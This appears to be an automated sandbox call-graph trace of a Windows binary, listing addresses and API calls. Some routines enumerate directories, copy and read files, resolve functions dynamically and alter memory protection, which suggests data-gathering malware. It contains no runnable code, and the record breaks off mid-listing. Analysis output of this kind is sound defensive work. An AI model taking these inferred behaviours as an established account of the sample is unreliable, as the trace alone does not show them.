6615->6617 6616->6615 6618 40335f 6617->6618 6619 40585f GetLastError 6617->6619 6620 405dbc 6618->6620 6619->6618 6621 405dc9 GetTickCount GetTempFileNameW 6620->6621 6622 40336a 6621->6622 6623 405dff 6621->6623 6622->6577 6623->6621 6623->6622 6624 341d5630 6625 341d563b 6624->6625 6627 341d5664 6625->6627 6629 341d5660 6625->6629 6630 341d5eb7 6625->6630 6637 341d5688 6627->6637 6631 341d5c45 _abort 5 API calls 6630->6631 6632 341d5ede 6631->6632 6633 341d5efc InitializeCriticalSectionAndSpinCount 6632->6633 6634 341d5ee7 6632->6634 6633->6634 6635 341d2ada _ValidateLocalCookies 5 API calls 6634->6635 6636 341d5f13 6635->6636 6636->6625 6638 341d56b4 6637->6638 6639 341d5695 6637->6639 6638->6629 6640 341d569f RtlDeleteCriticalSection 6639->6640 6640->6638 6640->6640 7512 341d3eb3 7513 341d5411 38 API calls 7512->7513 7514 341d3ebb 7513->7514 7515 341d60ac 7516 341d60b7 7515->7516 7518 341d60dd 7515->7518 7517 341d60c7 FreeLibrary 7516->7517 7516->7518 7517->7516 6641 341d742b 6642 341d7430 6641->6642 6644 341d7453 6642->6644 6645 341d8bae 6642->6645 6646 341d8bbb 6645->6646 6647 341d8bdd 6645->6647 6648 341d8bc9 RtlDeleteCriticalSection 6646->6648 6649 341d8bd7 6646->6649 6647->6642 6648->6648 6648->6649 6650 341d571e _free 20 API calls 6649->6650 6650->6647 6124 341dc7a7 6125 341dc7be 6124->6125 6134 341dc82c 6124->6134 6125->6134 6136 341dc7e6 GetModuleHandleA 6125->6136 6126 341dc835 GetModuleHandleA 6129 341dc83f 6126->6129 6127 341dc872 6131 341dc85f GetProcAddress 6129->6131 6129->6134 6130 341dc7dd 6130->6129 6132 341dc800 GetProcAddress 6130->6132 6130->6134 6131->6134 6133 341dc80d VirtualProtect 6132->6133 6132->6134 6133->6134 6135 341dc81c VirtualProtect 6133->6135 6134->6126 6134->6127 6134->6129 6135->6134 6137 341dc82c 6136->6137 6138 341dc7ef 6136->6138 6140 341dc835 GetModuleHandleA 6137->6140 6141 341dc872 6137->6141 6143 341dc83f 6137->6143 6148 341dc803 GetProcAddress 6138->6148 6140->6143 6142 341dc7f4 6142->6137 6144 341dc800 GetProcAddress 6142->6144 6143->6137 6143->6143 6147 341dc85f GetProcAddress 6143->6147 6144->6137 6145 341dc80d VirtualProtect 6144->6145 6145->6137 6146 341dc81c VirtualProtect 6145->6146 6146->6137 6147->6137 6149 341dc82c 6148->6149 6150 341dc80d VirtualProtect 6148->6150 6152 341dc835 GetModuleHandleA 6149->6152 6153 341dc872 6149->6153 6150->6149 6151 341dc81c VirtualProtect 6150->6151 6151->6149 6155 341dc83f 6152->6155 6154 341dc85f GetProcAddress 6154->6155 6155->6149 6155->6154 7519 341d21a1 ___scrt_dllmain_exception_filter 7520 341d81a0 7522 341d81d9 7520->7522 7521 341d81dd 7523 341d6368 __dosmaperr 20 API calls 7521->7523 7522->7521 7533 341d8205 7522->7533 7524 341d81e2 7523->7524 7526 341d62ac ___std_exception_copy 26 API calls 7524->7526 7525 341d8529 7527 341d2ada _ValidateLocalCookies 5 API calls 7525->7527 7528 341d81ed 7526->7528 7529 341d8536 7527->7529 7530 341d2ada _ValidateLocalCookies 5 API calls 7528->7530 7532 341d81f9 7530->7532 7533->7525 7534 341d80c0 7533->7534 7537 341d80db 7534->7537 7535 341d2ada _ValidateLocalCookies 5 API calls 7536 341d8152 7535->7536 7536->7533 7537->7535 7538 341d4bdd 7539 341d4bec 7538->7539 7540 341d4c08 7538->7540 7539->7540 7541 341d4bf2 7539->7541 7542 341d6d60 51 API calls 7540->7542 7543 341d6368 __dosmaperr 20 API calls 7541->7543 7544 341d4c0f GetModuleFileNameA 7542->7544 7545 341d4bf7 7543->7545 7546 341d4c33 7544->7546 7547 341d62ac ___std_exception_copy 26 API calls 7545->7547 7561 341d4d01 7546->7561 7558 341d4c01 7547->7558 7552 341d4c66 7554 341d6368 __dosmaperr 20 API calls 7552->7554 7553 341d4c72 7555 341d4d01 38 API calls 7553->7555 7560 341d4c6b 7554->7560 7557 341d4c88 7555->7557 7556 341d571e _free 20 API calls 7556->7558 7559 341d571e _free 20 API calls 7557->7559 7557->7560 7559->7560 7560->7556 7563 341d4d26 7561->7563 7565 341d4d86 7563->7565 7573 341d70eb 7563->7573 7564 341d4c50 7567 341d4e76 7564->7567 7565->7564 7566 341d70eb 38 API calls 7565->7566 7566->7565 7568 341d4e8b 7567->7568 7569 341d4c5d 7567->7569 7568->7569 7570 341d637b _abort 20 API calls 7568->7570 7569->7552 7569->7553 7571 341d4eb9 7570->7571 7572 341d571e _free 20 API calls 7571->7572 7572->7569 7576 341d7092 7573->7576 7577 341d54a7 __fassign 38 API calls 7576->7577 7578 341d70a6 7577->7578 7578->7563 5898 341d1c5b 5899 341d1c6b ___scrt_fastfail 5898->5899 5902 341d12ee 5899->5902 5901 341d1c87 5903 341d1324 ___scrt_fastfail 5902->5903 5904 341d13b7 GetEnvironmentVariableW 5903->5904 5928 341d10f1 5904->5928 5907 341d10f1 57 API calls 5908 341d1465 5907->5908 5909 341d10f1 57 API calls 5908->5909 5910 341d1479 5909->5910 5911 341d10f1 57 API calls 5910->5911 5912 341d148d 5911->5912 5913 341d10f1 57 API calls 5912->5913 5914 341d14a1 5913->5914 5915 341d10f1 57 API calls 5914->5915 5916 341d14b5 lstrlenW 5915->5916 5917 341d14d9 lstrlenW 5916->5917 5918 341d14d2 5916->5918 5919 341d10f1 57 API calls 5917->5919 5918->5901 5920 341d1501 lstrlenW lstrcatW 5919->5920 5921 341d10f1 57 API calls 5920->5921 5922 341d1539 lstrlenW lstrcatW 5921->5922 5923 341d10f1 57 API calls 5922->5923 5924 341d156b lstrlenW lstrcatW 5923->5924 5925 341d10f1 57 API calls 5924->5925 5926 341d159d lstrlenW lstrcatW 5925->5926 5927 341d10f1 57 API calls 5926->5927 5927->5918 5929 341d1118 ___scrt_fastfail 5928->5929 5930 341d1129 lstrlenW 5929->5930 5941 341d2c40 5930->5941 5933 341d1168 lstrlenW 5934 341d1177 lstrlenW FindFirstFileW 5933->5934 5935 341d11e1 5934->5935 5936 341d11a0 5934->5936 5935->5907 5937 341d11aa 5936->5937 5938 341d11c7 FindNextFileW 5936->5938 5937->5938 5943 341d1000 5937->5943 5938->5936 5940 341d11da FindClose 5938->5940 5940->5935 5942 341d1148 lstrcatW lstrlenW 5941->5942 5942->5933 5942->5934 5944 341d1022 ___scrt_fastfail 5943->5944 5945 341d10af 5944->5945 5946 341d102f lstrcatW lstrlenW 5944->5946 5949 341d10ad 5945->5949 5950 341d10b5 lstrlenW 5945->5950 5947 341d106b lstrlenW 5946->5947 5948 341d105a lstrlenW 5946->5948 5960 341d1e89 lstrlenW 5947->5960 5948->5947 5949->5937 5974 341d1e16 5950->5974 5953 341d10ca 5953->5949 5956 341d1e89 5 API calls 5953->5956 5954 341d1088 GetFileAttributesW 5954->5949 5955 341d109c 5954->5955 5955->5949 5966 341d173a 5955->5966 5957 341d10df 5956->5957 5979 341d11ea 5957->5979 5961 341d2c40 ___scrt_fastfail 5960->5961 5962 341d1ea7 lstrcatW lstrlenW 5961->5962 5963 341d1ed1 lstrcatW 5962->5963 5964 341d1ec2 5962->5964 5963->5954 5964->5963 5965 341d1ec7 lstrlenW 5964->5965 5965->5963 5967 341d1747 ___scrt_fastfail 5966->5967 5994 341d1cca 5967->5994 5970 341d199f 5970->5949 5973 341d1824 ___scrt_fastfail _strlen 5973->5970 6014 341d15da 5973->6014 5975 341d1e29 5974->5975 5978 341d1e4c 5974->5978 5976 341d1e2d lstrlenW 5975->5976 5975->5978 5977 341d1e3f lstrlenW 5976->5977 5976->5978 5977->5978 5978->5953 5980 341d120e ___scrt_fastfail 5979->5980 5981 341d1e89 5 API calls 5980->5981 5982 341d1220 GetFileAttributesW 5981->5982 5983 341d1235 5982->5983 5984 341d1246 5982->5984 5983->5984 5986 341d173a 35 API calls 5983->5986 5985 341d1e89 5 API calls 5984->5985 5987 341d1258 5985->5987 5986->5984 5988 341d10f1 56 API calls 5987->5988 5989 341d126d 5988->5989 5990 341d1e89 5 API calls 5989->5990 5991 341d127f ___scrt_fastfail 5990->5991 5992 341d10f1 56 API calls 5991->5992 5993 341d12e6 5992->5993 5993->5949 5995 341d1cf1 ___scrt_fastfail 5994->5995 5996 341d1d0f CopyFileW CreateFileW 5995->5996 5997 341d1d55 GetFileSize 5996->5997 5998 341d1d44 DeleteFileW 5996->5998 6000 341d1ede 22 API calls 5997->6000 5999 341d1808 5998->5999 5999->5970 6004 341d1ede 5999->6004 6001 341d1d66 ReadFile 6000->6001 6002 341d1d7d CloseHandle DeleteFileW 6001->6002 6003 341d1d94 CloseHandle DeleteFileW 6001->6003 6002->5999 6003->5999 6005 341d222f 6004->6005 6007 341d224e 6005->6007 6010 341d2250 6005->6010 6022 341d474f 6005->6022 6027 341d47e5 6005->6027 6007->5973 6009 341d2908 6011 341d35d2 __CxxThrowException@8 RaiseException 6009->6011 6010->6009 6034 341d35d2 6010->6034 6013 341d2925 6011->6013 6013->5973 6015 341d160c _strcat _strlen 6014->6015 6016 341d163c lstrlenW 6015->6016 6122 341d1c9d 6016->6122 6018 341d1655 lstrcatW lstrlenW 6019 341d1678 6018->6019 6020 341d167e lstrcatW 6019->6020 6021 341d1693 ___scrt_fastfail 6019->6021 6020->6021 6021->5973 6037 341d4793 6022->6037 6025 341d478f 6025->6005 6026 341d4765 6043 341d2ada 6026->6043 6032 341d56d0 _abort 6027->6032 6028 341d570e 6056 341d6368 6028->6056 6030 341d56f9 RtlAllocateHeap 6031 341d570c 6030->6031 6030->6032 6031->6005 6032->6028 6032->6030 6033 341d474f _abort 7 API calls 6032->6033 6033->6032 6035 341d35f2 RaiseException 6034->6035 6035->6009 6038 341d479f ___scrt_is_nonwritable_in_current_image 6037->6038 6050 341d5671 RtlEnterCriticalSection 6038->6050 6040 341d47aa 6051 341d47dc 6040->6051 6042 341d47d1 _abort 6042->6026 6044 341d2ae5 IsProcessorFeaturePresent 6043->6044 6045 341d2ae3 6043->6045 6047 341d2b58 6044->6047 6045->6025 6055 341d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6047->6055 6049 341d2c3b 6049->6025 6050->6040 6054 341d56b9 RtlLeaveCriticalSection 6051->6054 6053 341d47e3 6053->6042 6054->6053 6055->6049 6059 341d5b7a GetLastError 6056->6059 6060 341d5b99 6059->6060 6061 341d5b93 6059->6061 6065 341d5bf0 SetLastError 6060->6065 6085 341d637b 6060->6085 6078 341d5e08 6061->6078 6068 341d5bf9 6065->6068 6066 341d5bb3 6092 341d571e 6066->6092 6068->6031 6071 341d5bcf 6105 341d593c 6071->6105 6072 341d5bb9 6074 341d5be7 SetLastError 6072->6074 6074->6068 6076 341d571e _free 17 API calls 6077 341d5be0 6076->6077 6077->6065 6077->6074 6110 341d5c45 6078->6110 6080 341d5e2f 6081 341d5e47 TlsGetValue 6080->6081 6082 341d5e3b 6080->6082 6081->6082 6083 341d2ada _ValidateLocalCookies 5 API calls 6082->6083 6084 341d5e58 6083->6084 6084->6060 6090 341d6388 _abort 6085->6090 6086 341d63c8 6088 341d6368 __dosmaperr 19 API calls 6086->6088 6087 341d63b3 RtlAllocateHeap 6089 341d5bab 6087->6089 6087->6090 6088->6089 6089->6066 6098 341d5e5e 6089->6098 6090->6086 6090->6087 6091 341d474f _abort 7 API calls 6090->6091 6091->6090 6093 341d5729 HeapFree 6092->6093 6097 341d5752 __dosmaperr 6092->6097 6094 341d573e 6093->6094 6093->6097 6095 341d6368 __dosmaperr 18 API calls 6094->6095 6096 341d5744 GetLastError 6095->6096 6096->6097 6097->6072 6099 341d5c45 _abort 5 API calls 6098->6099 6100 341d5e85 6099->6100 6101 341d5ea0 TlsSetValue 6100->6101 6102 341d5e94 6100->6102 6101->6102 6103 341d2ada _ValidateLocalCookies 5 API calls 6102->6103 6104 341d5bc8 6103->6104 6104->6066 6104->6071 6116 341d5914 6105->6116 6113 341d5c71 6110->6113 6115 341d5c75 __crt_fast_encode_pointer 6110->6115 6111 341d5c95 6114 341d5ca1 GetProcAddress 6111->6114 6111->6115 6112 341d5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6112->6113 6113->6111 6113->6112 6113->6115 6114->6115 6115->6080 6117 341d5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6116->6117 6118 341d5938 6117->6118 6119 341d58c4 6118->6119 6120 341d5758 _abort 20 API calls 6119->6120 6121 341d58e8 6120->6121 6121->6076 6123 341d1ca6 _strlen 6122->6123 6123->6018 7579 341d20db 7580 341d20e7 ___scrt_is_nonwritable_in_current_image 7579->7580 7581 341d2110 dllmain_raw 7580->7581 7582 341d20f6 7580->7582 7587 341d210b 7580->7587 7581->7582 7583 341d212a 7581->7583 7592 341d1eec 7583->7592 7585 341d2177 7585->7582 7586 341d1eec 31 API calls 7585->7586 7588 341d218a 7586->7588 7587->7582 7587->7585 7590 341d1eec 31 API calls 7587->7590 7588->7582 7589 341d2193 dllmain_raw 7588->7589 7589->7582 7591 341d216d dllmain_raw 7590->7591 7591->7585 7593 341d1f2a dllmain_crt_process_detach 7592->7593 7594 341d1ef7 7592->7594 7595 341d1f06 7593->7595 7596 341d1f1c dllmain_crt_process_attach 7594->7596 7597 341d1efc 7594->7597 7595->7587 7596->7595 7598 341d1f01 7597->7598 7599 341d1f12 7597->7599 7598->7595 7602 341d240b 7598->7602 7607 341d23ec 7599->7607 7615 341d53e5 7602->7615 7736 341d3513 7607->7736 7610 341d23f5 7610->7595 7613 341d2408 7613->7595 7614 341d351e 7 API calls 7614->7610 7621 341d5aca 7615->7621 7618 341d351e 7725 341d3820 7618->7725 7620 341d2415 7620->7595 7622 341d5ad4 7621->7622 7624 341d2410 7621->7624 7623 341d5e08 _abort 11 API calls 7622->7623 7625 341d5adb 7623->7625 7624->7618 7625->7624 7626 341d5e5e _abort 11 API calls 7625->7626 7627 341d5aee 7626->7627 7629 341d59b5 7627->7629 7630 341d59c0 7629->7630 7631 341d59d0 7629->7631 7635 341d59d6 7630->7635 7631->7624 7634 341d571e _free 20 API calls 7634->7631 7636 341d59e9 7635->7636 7637 341d59ef 7635->7637 7638 341d571e _free 20 API calls 7636->7638 7639 341d571e _free 20 API calls 7637->7639 7638->7637 7640 341d59fb 7639->7640 7641 341d571e _free 20 API calls 7640->7641 7642 341d5a06 7641->7642 7643 341d571e _free 20 API calls 7642->7643 7644 341d5a11 7643->7644 7645 341d571e _free 20 API calls 7644->7645 7646 341d5a1c 7645->7646 7647 341d571e _free 20 API calls 7646->7647 7648 341d5a27 7647->7648 7649 341d571e _free 20 API calls 7648->7649 7650 341d5a32 7649->7650 7651 341d571e _free 20 API calls 7650->7651 7652 341d5a3d 7651->7652 7653 341d571e _free 20 API calls 7652->7653 7654 341d5a48 7653->7654 7655 341d571e _free 20 API calls 7654->7655 7656 341d5a56 7655->7656 7661 341d589c 7656->7661 7667 341d57a8 7661->7667 7663 341d58c0 7664 341d58ec 7663->7664 7680 341d5809 7664->7680 7666 341d5910 7666->7634 7668 341d57b4 ___scrt_is_nonwritable_in_current_image 7667->7668 7675 341d5671 RtlEnterCriticalSection 7668->7675 7671 341d57be 7673 341d571e _free 20 API calls 7671->7673 7674 341d57e8 7671->7674 7672 341d57f5 _abort 7672->7663 7673->7674 7676 341d57fd 7674->7676 7675->7671 7679 341d56b9 RtlLeaveCriticalSection 7676->7679 7678 341d5807 7678->7672 7679->7678 7681 341d5815 ___scrt_is_nonwritable_in_current_image 7680->7681 7688 341d5671 RtlEnterCriticalSection 7681->7688 7683 341d581f 7689 341d5a7f 7683->7689 7685 341d5832 7693 341d5848 7685->7693 7687 341d5840 _abort 7687->7666 7688->7683 7690 341d5ab5 __fassign 7689->7690 7691 341d5a8e __fassign 7689->7691 7690->7685 7691->7690 7696 341d7cc2 7691->7696 7724 341d56b9 RtlLeaveCriticalSection 7693->7724 7695 341d5852 7695->7687 7697 341d7d42 7696->7697 7702 341d7cd8 7696->7702 7699 341d571e _free 20 API calls 7697->7699 7723 341d7d90 7697->7723 7698 341d7e35 __fassign 20 API calls 7720 341d7d9e 7698->7720 7701 341d7d64 7699->7701 7700 341d7d0b 7703 341d7d2d 7700->7703 7710 341d571e _free 20 API calls 7700->7710 7704 341d571e _free 20 API calls 7701->7704 7702->7697 7702->7700 7705 341d571e _free 20 API calls 7702->7705 7707 341d571e _free 20 API calls 7703->7707 7706 341d7d77 7704->7706 7709 341d7d00 7705->7709 7711 341d571e _free 20 API calls 7706->7711 7712 341d7d37 7707->7712 7708 341d7dfe 7714 341d571e _free 20 API calls 7708->7714 7716 341d90ba ___free_lconv_mon 20 API calls 7709->7716 7717 341d7d22 7710->7717 7718 341d7d85 7711->7718 7713 341d571e _free 20 API calls 7712->7713 7713->7697 7719 341d7e04 7714->7719 7715 341d571e 20 API calls _free 7715->7720 7716->7700 7721 341d91b8 __fassign 20 API calls 7717->7721 7722 341d571e _free 20 API calls 7718->7722 7719->7690 7720->7708 7720->7715 7721->7703 7722->7723 7723->7698 7724->7695 7726 341d382d 7725->7726 7730 341d384b ___vcrt_freefls@4 7725->7730 7727 341d383b 7726->7727 7731 341d3b67 7726->7731 7729 341d3ba2 ___vcrt_FlsSetValue 6 API calls 7727->7729 7729->7730 7730->7620 7732 341d3a82 try_get_function 5 API calls 7731->7732 7733 341d3b81 7732->7733 7734 341d3b99 TlsGetValue 7733->7734 7735 341d3b8d 7733->7735 7734->7735 7735->7727 7742 341d3856 7736->7742 7738 341d23f1 7738->7610 7739 341d53da 7738->7739 7740 341d5b7a _abort 20 API calls 7739->7740 7741 341d23fd 7740->7741 7741->7613 7741->7614 7743 341d385f 7742->7743 7744 341d3862 GetLastError 7742->7744 7743->7738 7745 341d3b67 ___vcrt_FlsGetValue 6 API calls 7744->7745 7746 341d3877 7745->7746 7747 341d38dc SetLastError 7746->7747 7748 341d3ba2 ___vcrt_FlsSetValue 6 API calls 7746->7748 7753 341d3896 7746->7753 7747->7738 7749 341d3890 7748->7749 7750 341d38b8 7749->7750 7751 341d3ba2 ___vcrt_FlsSetValue 6 API calls 7749->7751 7749->7753 7752 341d3ba2 ___vcrt_FlsSetValue 6 API calls 7750->7752 7750->7753 7751->7750 7752->7753 7753->7747 7754 341d73d5 7755 341d73e1 ___scrt_is_nonwritable_in_current_image 7754->7755 7766 341d5671 RtlEnterCriticalSection 7755->7766 7757 341d73e8 7758 341d8be3 27 API calls 7757->7758 7759 341d73f7 7758->7759 7760 341d7406 7759->7760 7767 341d7269 GetStartupInfoW 7759->7767 7778 341d7422 7760->7778 7764 341d7417 _abort 7766->7757 7768 341d7286 7767->7768 7770 341d7318 7767->7770 7769 341d8be3 27 API calls 7768->7769 7768->7770 7771 341d72af 7769->7771 7773 341d731f 7770->7773 7771->7770 7772 341d72dd GetFileType 7771->7772 7772->7771 7774 341d7326 7773->7774 7775 341d7369 GetStdHandle 7774->7775 7776 341d73d1 7774->7776 7777 341d737c GetFileType 7774->7777 7775->7774 7776->7760 7777->7774 7781 341d56b9 RtlLeaveCriticalSection 7778->7781 7780 341d7429 7780->7764 7781->7780 7782 341d4ed7 7783 341d6d60 51 API calls 7782->7783 7784 341d4ee9 7783->7784 7793 341d7153 GetEnvironmentStringsW 7784->7793 7787 341d4ef4 7789 341d571e _free 20 API calls 7787->7789 7790 341d4f29 7789->7790 7791 341d4eff 7792 341d571e _free 20 API calls 7791->7792 7792->7787 7794 341d716a 7793->7794 7804 341d71bd 7793->7804 7797 341d7170 WideCharToMultiByte 7794->7797 7795 341d4eee 7795->7787 7805 341d4f2f 7795->7805 7796 341d71c6 FreeEnvironmentStringsW 7796->7795 7798 341d718c 7797->7798 7797->7804 7799 341d56d0 21 API calls 7798->7799 7800 341d7192 7799->7800 7801 341d7199 WideCharToMultiByte 7800->7801 7802 341d71af 7800->7802 7801->7802 7803 341d571e _free 20 API calls 7802->7803 7803->7804 7804->7795 7804->7796 7806 341d4f44 7805->7806 7807 341d637b _abort 20 API calls 7806->7807 7812 341d4f6b 7807->7812 7808 341d4fcf 7809 341d571e _free 20 API calls 7808->7809 7810 341d4fe9 7809->7810 7810->7791 7811 341d637b _abort 20 API calls 7811->7812 7812->7808 7812->7811 7813 341d4fd1 7812->7813 7815 341d544d ___std_exception_copy 26 API calls 7812->7815 7818 341d4ff3 7812->7818 7820 341d571e _free 20 API calls 7812->7820 7814 341d5000 20 API calls 7813->7814 7816 341d4fd7 7814->7816 7815->7812 7817 341d571e _free 20 API calls 7816->7817 7817->7808 7819 341d62bc ___std_exception_copy 11 API calls 7818->7819 7821 341d4fff 7819->7821 7820->7812 6651 341d5351 6652 341d5360 6651->6652 6657 341d5374 6651->6657 6655 341d571e _free 20 API calls 6652->6655 6652->6657 6653 341d571e _free 20 API calls 6654 341d5386 6653->6654 6656 341d571e _free 20 API calls 6654->6656 6655->6657 6658 341d5399 6656->6658 6657->6653 6659 341d571e _free 20 API calls 6658->6659 6660 341d53aa 6659->6660 6661 341d571e _free 20 API calls 6660->6661 6662 341d53bb 6661->6662 7822 405d8d GetFileAttributesW CreateFileW 7823 341d36d0 7824 341d36e2 7823->7824 7826 341d36f0 @_EH4_CallFilterFunc@8 7823->7826 7825 341d2ada _ValidateLocalCookies 5 API calls 7824->7825 7825->7826 6663 341d284f 6664 341d2882 std::exception::exception 27 API calls 6663->6664 6665 341d285d 6664->6665 6666 341d724e GetProcessHeap 6667 341d2049 6669 341d2055 ___scrt_is_nonwritable_in_current_image 6667->6669 6668 341d205e 6669->6668 6670 341d207d 6669->6670 6671 341d20d3 6669->6671 6681 341d244c 6670->6681 6672 341d2639 ___scrt_fastfail 4 API calls 6671->6672 6674 341d20da 6672->6674 6675 341d2082 6690 341d2308 6675->6690 6677 341d2087 __RTC_Initialize 6693 341d20c4 6677->6693 6679 341d209f 6696 341d260b 6679->6696 6682 341d2451 ___scrt_release_startup_lock 6681->6682 6683 341d2455 6682->6683 6684 341d2461 6682->6684 6685 341d527a _abort 20 API calls 6683->6685 6687 341d246e 6684->6687 6688 341d499b _abort 28 API calls 6684->6688 6686 341d245f 6685->6686 6686->6675 6687->6675 6689 341d4bbd 6688->6689 6689->6675 6702 341d34c7 RtlInterlockedFlushSList 6690->6702 6692 341d2312 6692->6677 6704 341d246f 6693->6704 6695 341d20c9 ___scrt_release_startup_lock 6695->6679 6697 341d2617 6696->6697 6699 341d262d 6697->6699 6723 341d53ed 6697->6723 6699->6668 6701 341d3529 ___vcrt_uninitialize 8 API calls 6701->6699 6703 341d34d7 6702->6703 6703->6692 6709 341d53ff 6704->6709 6707 341d391b ___vcrt_uninitialize_ptd 6 API calls 6708 341d354d 6707->6708 6708->6695 6712 341d5c2b 6709->6712 6713 341d5c35 6712->6713 6715 341d2476 6712->6715 6716 341d5db2 6713->6716 6715->6707 6717 341d5c45 _abort 5 API calls 6716->6717 6718 341d5dd9 6717->6718 6719 341d5df1 TlsFree 6718->6719 6720 341d5de5 6718->6720 6719->6720 6721 341d2ada _ValidateLocalCookies 5 API calls 6720->6721 6722 341d5e02 6721->6722 6722->6715 6726 341d74da 6723->6726 6729 341d74f3 6726->6729 6727 341d2ada _ValidateLocalCookies 5 API calls 6728 341d2625 6727->6728 6728->6701 6729->6727 6730 341d5348 6731 341d3529 ___vcrt_uninitialize 8 API calls 6730->6731 6732 341d534f 6731->6732 6733 341d7b48 6743 341d8ebf 6733->6743 6737 341d7b55 6756 341d907c 6737->6756 6740 341d7b7f 6741 341d571e _free 20 API calls 6740->6741 6742 341d7b8a 6741->6742 6760 341d8ec8 6743->6760 6745 341d7b50 6746 341d8fdc 6745->6746 6747 341d8fe8 ___scrt_is_nonwritable_in_current_image 6746->6747 6780 341d5671 RtlEnterCriticalSection 6747->6780 6749 341d905e 6794 341d9073 6749->6794 6751 341d9032 RtlDeleteCriticalSection 6754 341d571e _free 20 API calls 6751->6754 6752 341d906a _abort 6752->6737 6755 341d8ff3 6754->6755 6755->6749 6755->6751 6781 341da09c 6755->6781 6757 341d7b64 RtlDeleteCriticalSection 6756->6757 6758 341d9092 6756->6758 6757->6737 6757->6740 6758->6757 6759 341d571e _free 20 API calls 6758->6759 6759->6757 6761 341d8ed4 ___scrt_is_nonwritable_in_current_image 6760->6761 6770 341d5671 RtlEnterCriticalSection 6761->6770 6763 341d8f77 6775 341d8f97 6763->6775 6767 341d8f83 _abort 6767->6745 6768 341d8e78 66 API calls 6769 341d8ee3 6768->6769 6769->6763 6769->6768 6771 341d7b94 RtlEnterCriticalSection 6769->6771 6772 341d8f6d 6769->6772 6770->6769 6771->6769 6778 341d7ba8 RtlLeaveCriticalSection 6772->6778 6774 341d8f75 6774->6769 6779 341d56b9 RtlLeaveCriticalSection 6775->6779 6777 341d8f9e 6777->6767 6778->6774 6779->6777 6780->6755 6782 341da0a8 ___scrt_is_nonwritable_in_current_image 6781->6782 6783 341da0ce 6782->6783 6784 341da0b9 6782->6784 6793 341da0c9 _abort 6783->6793 6797 341d7b94 RtlEnterCriticalSection 6783->6797 6785 341d6368 __dosmaperr 20 API calls 6784->6785 6787 341da0be 6785->6787 6789 341d62ac ___std_exception_copy 26 API calls 6787->6789 6788 341da0ea 6798 341da026 6788->6798 6789->6793 6791 341da0f5 6814 341da112 6791->6814 6793->6755 7078 341d56b9 RtlLeaveCriticalSection 6794->7078 6796 341d907a 6796->6752 6797->6788 6799 341da048 6798->6799 6800 341da033 6798->6800 6805 341da043 6799->6805 6817 341d8e12 6799->6817 6801 341d6368 __dosmaperr 20 API calls 6800->6801 6802 341da038 6801->6802 6804 341d62ac ___std_exception_copy 26 API calls 6802->6804 6804->6805 6805->6791 6807 341d907c 20 API calls 6808 341da064 6807->6808 6823 341d7a5a 6808->6823 6810 341da06a 6830 341dadce 6810->6830 6813 341d571e _free 20 API calls 6813->6805 7077 341d7ba8 RtlLeaveCriticalSection 6814->7077 6816 341da11a 6816->6793 6818 341d8e2a 6817->6818 6822 341d8e26 6817->6822 6819 341d7a5a 26 API calls 6818->6819 6818->6822 6820 341d8e4a 6819->6820 6845 341d9a22 6820->6845 6822->6807 6824 341d7a7b 6823->6824 6825 341d7a66 6823->6825 6824->6810 6826 341d6368 __dosmaperr 20 API calls 6825->6826 6827 341d7a6b 6826->6827 6828 341d62ac ___std_exception_copy 26 API calls 6827->6828 6829 341d7a76 6828->6829 6829->6810 6831 341daddd 6830->6831 6832 341dadf2 6830->6832 6834 341d6355 __dosmaperr 20 API calls 6831->6834 6833 341dae2d 6832->6833 6837 341dae19 6832->6837 6835 341d6355 __dosmaperr 20 API calls 6833->6835 6836 341dade2 6834->6836 6838 341dae32 6835->6838 6839 341d6368 __dosmaperr 20 API calls 6836->6839 7034 341dada6 6837->7034 6841 341d6368 __dosmaperr 20 API calls 6838->6841 6842 341da070 6839->6842 6843 341dae3a 6841->6843 6842->6805 6842->6813 6844 341d62ac ___std_exception_copy 26 API calls 6843->6844 6844->6842 6846 341d9a2e ___scrt_is_nonwritable_in_current_image 6845->6846 6847 341d9a4e 6846->6847 6848 341d9a36 6846->6848 6849 341d9aec 6847->6849 6855 341d9a83 6847->6855 6870 341d6355 6848->6870 6852 341d6355 __dosmaperr 20 API calls 6849->6852 6854 341d9af1 6852->6854 6853 341d6368 __dosmaperr 20 API calls 6856 341d9a43 _abort 6853->6856 6857 341d6368 __dosmaperr 20 API calls 6854->6857 6873 341d8c7b RtlEnterCriticalSection 6855->6873 6856->6822 6859 341d9af9 6857->6859 6861 341d62ac ___std_exception_copy 26 API calls 6859->6861 6860 341d9a89 6862 341d9aba 6860->6862 6863 341d9aa5 6860->6863 6861->6856 6874 341d9b0d 6862->6874 6864 341d6368 __dosmaperr 20 API calls 6863->6864 6866 341d9aaa 6864->6866 6868 341d6355 __dosmaperr 20 API calls 6866->6868 6867 341d9ab5 6925 341d9ae4 6867->6925 6868->6867 6871 341d5b7a _abort 20 API calls 6870->6871 6872 341d635a 6871->6872 6872->6853 6873->6860 6875 341d9b3b 6874->6875 6912 341d9b34 6874->6912 6876 341d9b3f 6875->6876 6877 341d9b5e 6875->6877 6878 341d6355 __dosmaperr 20 API calls 6876->6878 6881 341d9baf 6877->6881 6882 341d9b92 6877->6882 6880 341d9b44 6878->6880 6879 341d2ada _ValidateLocalCookies 5 API calls 6883 341d9d15 6879->6883 6884 341d6368 __dosmaperr 20 API calls 6880->6884 6885 341d9bc5 6881->6885 6928 341da00b 6881->6928 6886 341d6355 __dosmaperr 20 API calls 6882->6886 6883->6867 6887 341d9b4b 6884->6887 6931 341d96b2 6885->6931 6890 341d9b97 6886->6890 6891 341d62ac ___std_exception_copy 26 API calls 6887->6891 6893 341d6368 __dosmaperr 20 API calls 6890->6893 6891->6912 6894 341d9b9f 6893->6894 6897 341d62ac ___std_exception_copy 26 API calls 6894->6897 6895 341d9c0c 6898 341d9c66 WriteFile 6895->6898 6899 341d9c20 6895->6899 6896 341d9bd3 6900 341d9bf9 6896->6900 6901 341d9bd7 6896->6901 6897->6912 6902 341d9c89 GetLastError 6898->6902 6907 341d9bef 6898->6907 6904 341d9c28 6899->6904 6905 341d9c56 6899->6905 6943 341d9492 GetConsoleCP 6900->6943 6906 341d9ccd 6901->6906 6938 341d9645 6901->6938 6902->6907 6908 341d9c2d 6904->6908 6909 341d9c46 6904->6909 6969 341d9728 6905->6969 6906->6912 6913 341d6368 __dosmaperr 20 API calls 6906->6913 6907->6906 6907->6912 6916 341d9ca9 6907->6916 6908->6906 6954 341d9807 6908->6954 6961 341d98f5 6909->6961 6912->6879 6915 341d9cf2 6913->6915 6918 341d6355 __dosmaperr 20 API calls 